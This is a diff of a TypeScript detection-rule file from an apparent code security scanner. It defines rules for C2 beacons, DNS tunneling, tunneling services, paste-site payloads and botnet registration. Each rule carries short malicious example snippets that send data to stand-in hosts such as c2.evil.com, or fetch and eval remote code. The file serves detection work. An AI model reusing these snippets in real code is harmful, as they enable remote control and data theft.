  487. package/src/analyzers/javascript/taintAnalyzer.ts +630 -0
  488. package/src/analyzers/php/index.ts +5 -0
  489. package/src/analyzers/php/phpAnalyzer.ts +280 -0
  490. package/src/analyzers/python/index.ts +5 -0
  491. package/src/analyzers/python/pythonAnalyzer.ts +319 -0
  492. package/src/cli/index.ts +276 -0
  493. package/src/dependencies/aiDependencyAnalyzer.ts +496 -0
  494. package/src/dependencies/database/cveDatabase.ts +426 -0
  495. package/src/dependencies/database/index.ts +6 -0
  496. package/src/dependencies/database/maliciousPackages.ts +286 -0
  497. package/src/dependencies/dependencyAnalyzer.ts +394 -0
  498. package/src/dependencies/detectors/index.ts +7 -0
  499. package/src/dependencies/detectors/securityStandards.ts +200 -0
  500. package/src/dependencies/detectors/vulnerabilityDetector.ts +343 -0
  501. package/src/dependencies/index.ts +27 -0
  502. package/src/dependencies/installed/index.ts +8 -0
  503. package/src/dependencies/installed/installedScanner.ts +821 -0
  504. package/src/dependencies/installed/malwarePatterns.ts +492 -0
  505. package/src/dependencies/installed/types.ts +287 -0
  506. package/src/dependencies/parsers/base/baseParser.ts +108 -0
  507. package/src/dependencies/parsers/base/index.ts +6 -0
  508. package/src/dependencies/parsers/cpp/cppParser.ts +245 -0
  509. package/src/dependencies/parsers/cpp/index.ts +6 -0
  510. package/src/dependencies/parsers/csharp/csharpParser.ts +151 -0
  511. package/src/dependencies/parsers/csharp/index.ts +6 -0
  512. package/src/dependencies/parsers/index.ts +56 -0
  513. package/src/dependencies/parsers/java/index.ts +6 -0
  514. package/src/dependencies/parsers/java/javaParser.ts +203 -0
  515. package/src/dependencies/parsers/javascript/index.ts +6 -0
  516. package/src/dependencies/parsers/javascript/javascriptParser.ts +362 -0
  517. package/src/dependencies/parsers/php/index.ts +6 -0
  518. package/src/dependencies/parsers/php/phpParser.ts +208 -0
  519. package/src/dependencies/parsers/python/index.ts +6 -0
  520. package/src/dependencies/parsers/python/pythonParser.ts +437 -0
  521. package/src/dependencies/types.ts +330 -0
  522. package/src/i18n/index.ts +1 -0
  523. package/src/i18n/translations.ts +194 -0
  524. package/src/index.ts +16 -0
  525. package/src/reports/dependencyReportGenerator.ts +717 -0
  526. package/src/reports/htmlReportGenerator.ts +781 -0
  527. package/src/reports/index.ts +7 -0
  528. package/src/reports/installedDepsReportGenerator.ts +899 -0
  529. package/src/rules/index.ts +58 -0
  530. package/src/rules/malware/INFO.md +287 -0
  531. package/src/rules/malware/categories/backdoors.ts +174 -0
  532. package/src/rules/malware/categories/cryptominers.ts +434 -0
  533. package/src/rules/malware/categories/exfiltration.ts +677 -0
  534. package/src/rules/malware/categories/keyloggers.ts +780 -0
  535. package/src/rules/malware/categories/loaders.ts +721 -0
  536. package/src/rules/malware/categories/network.ts +639 -0
  537. package/src/rules/malware/categories/obfuscation.ts +788 -0
  538. package/src/rules/malware/constants/index.ts +358 -0
  539. package/src/rules/malware/engine/index.ts +758 -0
  540. package/src/rules/malware/index.ts +928 -0
  541. package/src/rules/malware/scoring/index.ts +549 -0
  542. package/src/rules/malware/types/index.ts +752 -0
  543. package/src/rules/malware/utils/index.ts +643 -0
  544. package/src/rules/standards.ts +372 -0
  545. package/src/rules/vulnerabilities/PROMPT_VULNERABILITIES.md +226 -0
  546. package/src/rules/vulnerabilities/constants/index.ts +625 -0
  547. package/src/rules/vulnerabilities/engine/index.ts +831 -0
  548. package/src/rules/vulnerabilities/index.ts +312 -0
  549. package/src/rules/vulnerabilities/rules/authentication.ts +426 -0
  550. package/src/rules/vulnerabilities/rules/commandInjection.ts +307 -0
  551. package/src/rules/vulnerabilities/rules/csrf.ts +268 -0
  552. package/src/rules/vulnerabilities/rules/deserialization.ts +343 -0
  553. package/src/rules/vulnerabilities/rules/fileUpload.ts +332 -0
  554. package/src/rules/vulnerabilities/rules/hardcodedSecrets.ts +453 -0
  555. package/src/rules/vulnerabilities/rules/index.ts +17 -0
  556. package/src/rules/vulnerabilities/rules/pathTraversal.ts +358 -0
  557. package/src/rules/vulnerabilities/rules/prototypePollution.ts +279 -0
  558. package/src/rules/vulnerabilities/rules/securityMisconfiguration.ts +445 -0
  559. package/src/rules/vulnerabilities/rules/sqlInjection.ts +669 -0
  560. package/src/rules/vulnerabilities/rules/ssrf.ts +408 -0
  561. package/src/rules/vulnerabilities/rules/xss.ts +753 -0
  562. package/src/rules/vulnerabilities/scoring/index.ts +543 -0
  563. package/src/rules/vulnerabilities/types/index.ts +1004 -0
  564. package/src/rules/vulnerabilities/utils/index.ts +709 -0
  565. package/src/types/index.ts +391 -0
  566. package/src/utils/index.ts +306 -0
  567. package/src/utils/logger.ts +150 -0
  568. package/test-installed-scanner.ts +136 -0
  569. package/tsconfig.json +30 -0
@@ -0,0 +1,639 @@
1
+ /**
2
+ * @fileoverview Suspicious Network and C2 Detection Rules
3
+ * @module rules/malware/categories/network
4
+ *
5
+ * Comprehensive rules for detecting suspicious network activity including:
6
+ * - Command and Control (C2) communication
7
+ * - DNS tunneling
8
+ * - Botnet patterns
9
+ * - Suspicious external connections
10
+ * - Data exfiltration channels
11
+ */
12
+
13
+ import {
14
+ MalwareRule,
15
+ MalwareThreatType,
16
+ MalwareCategory,
17
+ MalwareSeverity,
18
+ ConfidenceLevel,
19
+ SupportedLanguage,
20
+ PatternType,
21
+ MitreTactic
22
+ } from '../types';
23
+
24
+ // ============================================================================
25
+ // C2 COMMUNICATION RULES
26
+ // ============================================================================
27
+
28
+ export const c2Rules: MalwareRule[] = [
29
+ {
30
+ id: 'MAL-NET-001',
31
+ name: 'C2 Communication - Beacon Pattern',
32
+ description: 'Detects periodic heartbeat/beacon communication with external servers.',
33
+ version: '2.0.0',
34
+ threatType: MalwareThreatType.C2_COMMUNICATION,
35
+ category: MalwareCategory.BOTNET,
36
+ languages: [
37
+ SupportedLanguage.JAVASCRIPT,
38
+ SupportedLanguage.TYPESCRIPT,
39
+ SupportedLanguage.PYTHON
40
+ ],
41
+ severity: MalwareSeverity.CRITICAL,
42
+ confidence: ConfidenceLevel.HIGH,
43
+ baseScore: 88,
44
+ patterns: [
45
+ {
46
+ type: PatternType.REGEX,
47
+ patternId: 'setinterval-http',
48
+ pattern: 'setInterval\\s*\\([^)]*(?:fetch|axios|XMLHttpRequest|http)[^)]*,\\s*\\d{4,}\\s*\\)',
49
+ flags: 'gis',
50
+ weight: 0.9,
51
+ description: 'Periodic HTTP requests'
52
+ },
53
+ {
54
+ type: PatternType.REGEX,
55
+ patternId: 'python-loop-http',
56
+ pattern: 'while\\s+True:[\\s\\S]*?(?:requests\\.|urllib|http\\.client)[\\s\\S]*?time\\.sleep\\s*\\(\\s*\\d+',
57
+ flags: 'gis',
58
+ weight: 1.0,
59
+ description: 'Python infinite loop with HTTP and sleep'
60
+ },
61
+ {
62
+ type: PatternType.REGEX,
63
+ patternId: 'heartbeat-function',
64
+ pattern: 'function\\s+(?:heartbeat|beacon|ping)\\s*\\([^)]*\\)[\\s\\S]*?(?:fetch|http)',
65
+ flags: 'gis',
66
+ weight: 0.8,
67
+ description: 'Heartbeat/beacon function'
68
+ }
69
+ ],
70
+ amplifyingPatterns: [
71
+ {
72
+ type: PatternType.REGEX,
73
+ patternId: 'command-response',
74
+ pattern: '(?:cmd|command|task|job)\\s*[:=]',
75
+ flags: 'gi',
76
+ weight: 0.4,
77
+ description: 'Command/task variables'
78
+ }
79
+ ],
80
+ maliciousExamples: [
81
+ {
82
+ code: `setInterval(async () => {
83
+ const response = await fetch('https://c2.evil.com/beacon', {
84
+ method: 'POST',
85
+ body: JSON.stringify({ id: botId, status: 'alive' })
86
+ });
87
+ const cmd = await response.json();
88
+ if (cmd.task) executeTask(cmd.task);
89
+ }, 30000);`,
90
+ language: SupportedLanguage.JAVASCRIPT,
91
+ isMalicious: true,
92
+ description: 'C2 beacon with command execution'
93
+ }
94
+ ],
95
+ impact: {
96
+ technical: 'Maintains persistent connection to command and control server.',
97
+ business: 'Allows remote control of compromised system.',
98
+ affectedAssets: ['Network', 'System control'],
99
+ dataAtRisk: ['All accessible data', 'System control']
100
+ },
101
+ remediation: {
102
+ summary: 'Block C2 communication and remove malware.',
103
+ steps: [
104
+ 'Block C2 server IPs/domains at network level',
105
+ 'Remove beacon code',
106
+ 'Analyze command history if available',
107
+ 'Check for additional payloads or persistence',
108
+ 'Reset credentials'
109
+ ]
110
+ },
111
+ mitreAttack: [
112
+ {
113
+ tacticId: MitreTactic.COMMAND_AND_CONTROL,
114
+ tacticName: 'Command and Control',
115
+ techniqueId: 'T1071',
116
+ techniqueName: 'Application Layer Protocol',
117
+ url: 'https://attack.mitre.org/techniques/T1071/'
118
+ }
119
+ ],
120
+ tags: ['c2', 'beacon', 'heartbeat', 'botnet', 'critical'],
121
+ enabled: true
122
+ },
123
+ {
124
+ id: 'MAL-NET-002',
125
+ name: 'C2 Communication - WebSocket Channel',
126
+ description: 'Detects WebSocket-based C2 communication channels.',
127
+ version: '2.0.0',
128
+ threatType: MalwareThreatType.C2_COMMUNICATION,
129
+ category: MalwareCategory.BOTNET,
130
+ languages: [SupportedLanguage.JAVASCRIPT, SupportedLanguage.TYPESCRIPT],
131
+ severity: MalwareSeverity.HIGH,
132
+ confidence: ConfidenceLevel.HIGH,
133
+ baseScore: 80,
134
+ patterns: [
135
+ {
136
+ type: PatternType.REGEX,
137
+ patternId: 'websocket-external',
138
+ pattern: 'new\\s+WebSocket\\s*\\([^)]*wss?:\\/\\/(?!localhost|127\\.0\\.0\\.1)',
139
+ flags: 'gis',
140
+ weight: 0.8,
141
+ description: 'WebSocket to external server'
142
+ },
143
+ {
144
+ type: PatternType.REGEX,
145
+ patternId: 'ws-onmessage-eval',
146
+ pattern: '\\.onmessage\\s*=\\s*[^;]*\\{[^}]*(?:eval|Function|exec)',
147
+ flags: 'gis',
148
+ weight: 1.0,
149
+ description: 'WebSocket message with eval'
150
+ },
151
+ {
152
+ type: PatternType.REGEX,
153
+ patternId: 'ws-command-handler',
154
+ pattern: '\\.onmessage[\\s\\S]*?JSON\\.parse[\\s\\S]*?(?:cmd|command|task)',
155
+ flags: 'gis',
156
+ weight: 0.9,
157
+ description: 'WebSocket command handler'
158
+ }
159
+ ],
160
+ maliciousExamples: [
161
+ {
162
+ code: `const ws = new WebSocket('wss://c2.evil.com/control');
163
+ ws.onmessage = (event) => {
164
+ const cmd = JSON.parse(event.data);
165
+ if (cmd.type === 'exec') {
166
+ eval(cmd.code);
167
+ }
168
+ };`,
169
+ language: SupportedLanguage.JAVASCRIPT,
170
+ isMalicious: true,
171
+ description: 'WebSocket C2 with command execution'
172
+ }
173
+ ],
174
+ impact: {
175
+ technical: 'Real-time bidirectional C2 communication channel.',
176
+ business: 'Enables real-time remote control and data exfiltration.',
177
+ affectedAssets: ['Network', 'System'],
178
+ dataAtRisk: ['Real-time data access']
179
+ },
180
+ remediation: {
181
+ summary: 'Close WebSocket connections and block C2 servers.',
182
+ steps: [
183
+ 'Close unauthorized WebSocket connections',
184
+ 'Block C2 server at firewall',
185
+ 'Remove malicious code',
186
+ 'Monitor WebSocket usage'
187
+ ]
188
+ },
189
+ tags: ['c2', 'websocket', 'real-time', 'high'],
190
+ enabled: true
191
+ }
192
+ ];
193
+
194
+ // ============================================================================
195
+ // SUSPICIOUS CONNECTION RULES
196
+ // ============================================================================
197
+
198
+ export const suspiciousConnectionRules: MalwareRule[] = [
199
+ {
200
+ id: 'MAL-NET-010',
201
+ name: 'Suspicious Connection - IP Address Hardcoded',
202
+ description: 'Detects hardcoded IP addresses in network connections, often used by malware.',
203
+ version: '2.0.0',
204
+ threatType: MalwareThreatType.SUSPICIOUS_NETWORK,
205
+ category: MalwareCategory.SUSPICIOUS,
206
+ languages: [
207
+ SupportedLanguage.JAVASCRIPT,
208
+ SupportedLanguage.TYPESCRIPT,
209
+ SupportedLanguage.PYTHON,
210
+ SupportedLanguage.PHP
211
+ ],
212
+ severity: MalwareSeverity.MEDIUM,
213
+ confidence: ConfidenceLevel.MEDIUM,
214
+ baseScore: 60,
215
+ patterns: [
216
+ {
217
+ type: PatternType.REGEX,
218
+ patternId: 'fetch-ip',
219
+ pattern: '(?:fetch|axios|request|http)\\s*\\([^)]*[\'"]https?:\\/\\/\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',
220
+ flags: 'gis',
221
+ weight: 0.8,
222
+ description: 'HTTP request to IP address'
223
+ },
224
+ {
225
+ type: PatternType.REGEX,
226
+ patternId: 'socket-ip',
227
+ pattern: '(?:socket|connect)\\s*\\([^)]*\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',
228
+ flags: 'gi',
229
+ weight: 0.9,
230
+ description: 'Socket connection to IP'
231
+ }
232
+ ],
233
+ falsePositivePatterns: [
234
+ {
235
+ type: PatternType.REGEX,
236
+ patternId: 'localhost-ip',
237
+ pattern: '127\\.0\\.0\\.1|0\\.0\\.0\\.0',
238
+ flags: 'gi',
239
+ weight: 0.4,
240
+ description: 'Localhost addresses'
241
+ },
242
+ {
243
+ type: PatternType.REGEX,
244
+ patternId: 'config-var',
245
+ pattern: 'config\\.|process\\.env\\.|settings\\.',
246
+ flags: 'gi',
247
+ weight: 0.3,
248
+ description: 'Configuration variables'
249
+ }
250
+ ],
251
+ maliciousExamples: [
252
+ {
253
+ code: `fetch('http://45.33.32.156:8080/data', { method: 'POST', body: sensitiveData });`,
254
+ language: SupportedLanguage.JAVASCRIPT,
255
+ isMalicious: true,
256
+ description: 'Hardcoded IP data exfiltration'
257
+ }
258
+ ],
259
+ impact: {
260
+ technical: 'Direct connection to IP address bypassing DNS.',
261
+ business: 'Potential data exfiltration or C2 communication.',
262
+ affectedAssets: ['Network connections'],
263
+ dataAtRisk: ['Transmitted data']
264
+ },
265
+ remediation: {
266
+ summary: 'Investigate IP addresses and remove unauthorized connections.',
267
+ steps: [
268
+ 'Identify the IP addresses and their purpose',
269
+ 'Check IP reputation',
270
+ 'Remove unauthorized connections',
271
+ 'Use domain names with proper validation'
272
+ ]
273
+ },
274
+ tags: ['suspicious-network', 'hardcoded-ip', 'medium'],
275
+ enabled: true
276
+ },
277
+ {
278
+ id: 'MAL-NET-011',
279
+ name: 'Suspicious Connection - TOR/I2P/Anonymous Network',
280
+ description: 'Detects connections to TOR, I2P, or other anonymizing networks.',
281
+ version: '2.0.0',
282
+ threatType: MalwareThreatType.SUSPICIOUS_NETWORK,
283
+ category: MalwareCategory.SUSPICIOUS,
284
+ languages: [
285
+ SupportedLanguage.JAVASCRIPT,
286
+ SupportedLanguage.TYPESCRIPT,
287
+ SupportedLanguage.PYTHON
288
+ ],
289
+ severity: MalwareSeverity.HIGH,
290
+ confidence: ConfidenceLevel.HIGH,
291
+ baseScore: 75,
292
+ patterns: [
293
+ {
294
+ type: PatternType.REGEX,
295
+ patternId: 'onion-domain',
296
+ pattern: '\\.onion[/\'"]',
297
+ flags: 'gi',
298
+ weight: 1.0,
299
+ description: 'TOR .onion domain'
300
+ },
301
+ {
302
+ type: PatternType.REGEX,
303
+ patternId: 'i2p-domain',
304
+ pattern: '\\.i2p[/\'"]',
305
+ flags: 'gi',
306
+ weight: 1.0,
307
+ description: 'I2P domain'
308
+ },
309
+ {
310
+ type: PatternType.REGEX,
311
+ patternId: 'tor-proxy',
312
+ pattern: 'socks[45]?:\\/\\/(?:localhost|127\\.0\\.0\\.1):(?:9050|9150)',
313
+ flags: 'gi',
314
+ weight: 1.0,
315
+ description: 'TOR SOCKS proxy'
316
+ }
317
+ ],
318
+ maliciousExamples: [
319
+ {
320
+ code: `const response = await fetch('http://evil3rz44k4pbcm.onion/api/data');`,
321
+ language: SupportedLanguage.JAVASCRIPT,
322
+ isMalicious: true,
323
+ description: 'Connection to TOR hidden service'
324
+ }
325
+ ],
326
+ impact: {
327
+ technical: 'Anonymous network usage to hide communication.',
328
+ business: 'Difficult to trace malicious activity.',
329
+ affectedAssets: ['Network traffic'],
330
+ dataAtRisk: ['Untraced data exfiltration']
331
+ },
332
+ remediation: {
333
+ summary: 'Block anonymous network connections and investigate usage.',
334
+ steps: [
335
+ 'Block TOR/I2P at network level',
336
+ 'Remove anonymous network code',
337
+ 'Investigate purpose of anonymous communication',
338
+ 'Monitor for similar patterns'
339
+ ]
340
+ },
341
+ tags: ['tor', 'i2p', 'anonymous', 'suspicious', 'high'],
342
+ enabled: true
343
+ },
344
+ {
345
+ id: 'MAL-NET-012',
346
+ name: 'Suspicious Connection - Pastebin/Text Hosting',
347
+ description: 'Detects connections to paste sites often used for C2 or payload hosting.',
348
+ version: '2.0.0',
349
+ threatType: MalwareThreatType.SUSPICIOUS_NETWORK,
350
+ category: MalwareCategory.SUSPICIOUS,
351
+ languages: [
352
+ SupportedLanguage.JAVASCRIPT,
353
+ SupportedLanguage.TYPESCRIPT,
354
+ SupportedLanguage.PYTHON,
355
+ SupportedLanguage.PHP
356
+ ],
357
+ severity: MalwareSeverity.MEDIUM,
358
+ confidence: ConfidenceLevel.HIGH,
359
+ baseScore: 68,
360
+ patterns: [
361
+ {
362
+ type: PatternType.REGEX,
363
+ patternId: 'pastebin-fetch',
364
+ pattern: '(?:fetch|axios|request|urllib|curl)\\s*\\([^)]*(?:pastebin\\.com|hastebin\\.com|ghostbin\\.com|rentry\\.co|dpaste\\.org)',
365
+ flags: 'gis',
366
+ weight: 1.0,
367
+ description: 'Connection to paste site'
368
+ },
369
+ {
370
+ type: PatternType.REGEX,
371
+ patternId: 'raw-paste',
372
+ pattern: 'pastebin\\.com\\/raw\\/|raw\\.githubusercontent\\.com',
373
+ flags: 'gi',
374
+ weight: 0.9,
375
+ description: 'Raw paste content fetch'
376
+ }
377
+ ],
378
+ maliciousExamples: [
379
+ {
380
+ code: `const payload = await fetch('https://pastebin.com/raw/Ej8kL9mN').then(r => r.text());
381
+ eval(payload);`,
382
+ language: SupportedLanguage.JAVASCRIPT,
383
+ isMalicious: true,
384
+ description: 'Pastebin payload loading'
385
+ }
386
+ ],
387
+ impact: {
388
+ technical: 'Uses public paste sites for payload hosting or C2.',
389
+ business: 'Common malware delivery mechanism.',
390
+ affectedAssets: ['Application'],
391
+ dataAtRisk: ['Depends on payload']
392
+ },
393
+ remediation: {
394
+ summary: 'Block paste site connections and remove payload loading code.',
395
+ steps: [
396
+ 'Remove paste site connections',
397
+ 'Analyze fetched content',
398
+ 'Block paste sites at network level if appropriate'
399
+ ]
400
+ },
401
+ tags: ['pastebin', 'paste-site', 'c2', 'medium'],
402
+ enabled: true
403
+ },
404
+ {
405
+ id: 'MAL-NET-013',
406
+ name: 'Suspicious Connection - Tunneling Service',
407
+ description: 'Detects connections to ngrok, serveo, or other tunneling services.',
408
+ version: '2.0.0',
409
+ threatType: MalwareThreatType.SUSPICIOUS_NETWORK,
410
+ category: MalwareCategory.SUSPICIOUS,
411
+ languages: [
412
+ SupportedLanguage.JAVASCRIPT,
413
+ SupportedLanguage.TYPESCRIPT,
414
+ SupportedLanguage.PYTHON
415
+ ],
416
+ severity: MalwareSeverity.MEDIUM,
417
+ confidence: ConfidenceLevel.HIGH,
418
+ baseScore: 65,
419
+ patterns: [
420
+ {
421
+ type: PatternType.REGEX,
422
+ patternId: 'ngrok-domain',
423
+ pattern: '(?:ngrok\\.io|serveo\\.net|localhost\\.run|localtunnel\\.me)',
424
+ flags: 'gi',
425
+ weight: 1.0,
426
+ description: 'Tunneling service domain'
427
+ }
428
+ ],
429
+ falsePositivePatterns: [
430
+ {
431
+ type: PatternType.REGEX,
432
+ patternId: 'dev-comment',
433
+ pattern: '\\/\\/.*(?:ngrok|tunnel)|#.*(?:ngrok|tunnel)',
434
+ flags: 'gi',
435
+ weight: 0.3,
436
+ description: 'Development comment'
437
+ }
438
+ ],
439
+ maliciousExamples: [
440
+ {
441
+ code: `fetch('https://abc123.ngrok.io/exfil', { method: 'POST', body: data });`,
442
+ language: SupportedLanguage.JAVASCRIPT,
443
+ isMalicious: true,
444
+ description: 'Data exfiltration via ngrok tunnel'
445
+ }
446
+ ],
447
+ impact: {
448
+ technical: 'Uses tunneling services to bypass network restrictions.',
449
+ business: 'Data exfiltration bypassing firewall rules.',
450
+ affectedAssets: ['Network security'],
451
+ dataAtRisk: ['Exfiltrated data']
452
+ },
453
+ remediation: {
454
+ summary: 'Block tunneling services and remove connections.',
455
+ steps: [
456
+ 'Remove tunneling service connections',
457
+ 'Block tunneling domains at network level',
458
+ 'Investigate data being transmitted'
459
+ ]
460
+ },
461
+ tags: ['ngrok', 'tunnel', 'bypass', 'medium'],
462
+ enabled: true
463
+ }
464
+ ];
465
+
466
+ // ============================================================================
467
+ // DNS TUNNELING RULES
468
+ // ============================================================================
469
+
470
+ export const dnsTunnelingRules: MalwareRule[] = [
471
+ {
472
+ id: 'MAL-NET-020',
473
+ name: 'DNS Tunneling - Subdomain Data Encoding',
474
+ description: 'Detects patterns indicative of DNS tunneling for data exfiltration.',
475
+ version: '2.0.0',
476
+ threatType: MalwareThreatType.DNS_TUNNELING,
477
+ category: MalwareCategory.BOTNET,
478
+ languages: [
479
+ SupportedLanguage.JAVASCRIPT,
480
+ SupportedLanguage.TYPESCRIPT,
481
+ SupportedLanguage.PYTHON
482
+ ],
483
+ severity: MalwareSeverity.HIGH,
484
+ confidence: ConfidenceLevel.MEDIUM,
485
+ baseScore: 72,
486
+ patterns: [
487
+ {
488
+ type: PatternType.REGEX,
489
+ patternId: 'dns-lookup-data',
490
+ pattern: 'dns\\.(?:resolve|lookup)\\s*\\([^)]*[+]|dns\\.resolve[\\s\\S]*?(?:btoa|base64|hex)',
491
+ flags: 'gis',
492
+ weight: 0.9,
493
+ description: 'DNS lookup with data encoding'
494
+ },
495
+ {
496
+ type: PatternType.REGEX,
497
+ patternId: 'subdomain-chunking',
498
+ pattern: '\\.(?:match|substring|slice)\\s*\\([^)]*\\)[\\s\\S]{0,50}\\.dns|\\.[a-z0-9]{20,}\\.',
499
+ flags: 'gis',
500
+ weight: 0.7,
501
+ description: 'Subdomain data chunking'
502
+ },
503
+ {
504
+ type: PatternType.REGEX,
505
+ patternId: 'python-dns-tunnel',
506
+ pattern: 'dns\\.resolver[\\s\\S]*?query\\s*\\([^)]*\\+',
507
+ flags: 'gis',
508
+ weight: 0.8,
509
+ description: 'Python DNS query with data'
510
+ }
511
+ ],
512
+ maliciousExamples: [
513
+ {
514
+ code: `const data = btoa(sensitiveInfo);
515
+ for (let i = 0; i < data.length; i += 63) {
516
+ const chunk = data.substring(i, i + 63);
517
+ dns.resolve(\`\${chunk}.exfil.evil.com\`, 'TXT', () => {});
518
+ }`,
519
+ language: SupportedLanguage.JAVASCRIPT,
520
+ isMalicious: true,
521
+ description: 'DNS tunneling data exfiltration'
522
+ }
523
+ ],
524
+ impact: {
525
+ technical: 'Uses DNS protocol for covert data exfiltration.',
526
+ business: 'Bypasses traditional network monitoring.',
527
+ affectedAssets: ['DNS traffic', 'Network'],
528
+ dataAtRisk: ['Exfiltrated sensitive data']
529
+ },
530
+ remediation: {
531
+ summary: 'Monitor DNS traffic and block DNS tunneling domains.',
532
+ steps: [
533
+ 'Remove DNS tunneling code',
534
+ 'Implement DNS monitoring for anomalous queries',
535
+ 'Block identified tunneling domains',
536
+ 'Use DNS security solutions'
537
+ ]
538
+ },
539
+ mitreAttack: [
540
+ {
541
+ tacticId: MitreTactic.COMMAND_AND_CONTROL,
542
+ tacticName: 'Command and Control',
543
+ techniqueId: 'T1071.004',
544
+ techniqueName: 'DNS',
545
+ url: 'https://attack.mitre.org/techniques/T1071/004/'
546
+ }
547
+ ],
548
+ tags: ['dns-tunneling', 'exfiltration', 'covert-channel', 'high'],
549
+ enabled: true
550
+ }
551
+ ];
552
+
553
+ // ============================================================================
554
+ // BOTNET RULES
555
+ // ============================================================================
556
+
557
+ export const botnetRules: MalwareRule[] = [
558
+ {
559
+ id: 'MAL-NET-030',
560
+ name: 'Botnet - Client Registration',
561
+ description: 'Detects bot registration patterns with C2 server.',
562
+ version: '2.0.0',
563
+ threatType: MalwareThreatType.BOTNET,
564
+ category: MalwareCategory.BOTNET,
565
+ languages: [
566
+ SupportedLanguage.JAVASCRIPT,
567
+ SupportedLanguage.TYPESCRIPT,
568
+ SupportedLanguage.PYTHON
569
+ ],
570
+ severity: MalwareSeverity.CRITICAL,
571
+ confidence: ConfidenceLevel.HIGH,
572
+ baseScore: 85,
573
+ patterns: [
574
+ {
575
+ type: PatternType.REGEX,
576
+ patternId: 'bot-registration',
577
+ pattern: '(?:bot[-_]?id|client[-_]?id|uuid)[\\s\\S]*?(?:fetch|post|send)[\\s\\S]*?(?:register|join|connect)',
578
+ flags: 'gis',
579
+ weight: 0.9,
580
+ description: 'Bot registration pattern'
581
+ },
582
+ {
583
+ type: PatternType.REGEX,
584
+ patternId: 'bot-info-collect',
585
+ pattern: '(?:navigator\\.userAgent|os\\.platform|hostname)[\\s\\S]*?(?:fetch|post|send)',
586
+ flags: 'gis',
587
+ weight: 0.7,
588
+ description: 'System info collection and send'
589
+ }
590
+ ],
591
+ maliciousExamples: [
592
+ {
593
+ code: `const botId = crypto.randomUUID();
594
+ const info = {
595
+ id: botId,
596
+ platform: navigator.platform,
597
+ ua: navigator.userAgent
598
+ };
599
+ fetch('https://botnet.evil.com/register', {
600
+ method: 'POST',
601
+ body: JSON.stringify(info)
602
+ });`,
603
+ language: SupportedLanguage.JAVASCRIPT,
604
+ isMalicious: true,
605
+ description: 'Bot registration with system info'
606
+ }
607
+ ],
608
+ impact: {
609
+ technical: 'Enrolls system as bot in botnet.',
610
+ business: 'System becomes part of criminal infrastructure.',
611
+ affectedAssets: ['System', 'Network'],
612
+ dataAtRisk: ['System resources', 'Network bandwidth']
613
+ },
614
+ remediation: {
615
+ summary: 'Remove botnet code and block C2 infrastructure.',
616
+ steps: [
617
+ 'Remove bot registration code',
618
+ 'Block botnet C2 servers',
619
+ 'Scan for additional malware',
620
+ 'Reset credentials'
621
+ ]
622
+ },
623
+ tags: ['botnet', 'registration', 'c2', 'critical'],
624
+ enabled: true
625
+ }
626
+ ];
627
+
628
+ // ============================================================================
629
+ // EXPORT ALL NETWORK RULES
630
+ // ============================================================================
631
+
632
+ export const networkRules: MalwareRule[] = [
633
+ ...c2Rules,
634
+ ...suspiciousConnectionRules,
635
+ ...dnsTunnelingRules,
636
+ ...botnetRules
637
+ ];
638
+
639
+ export default networkRules;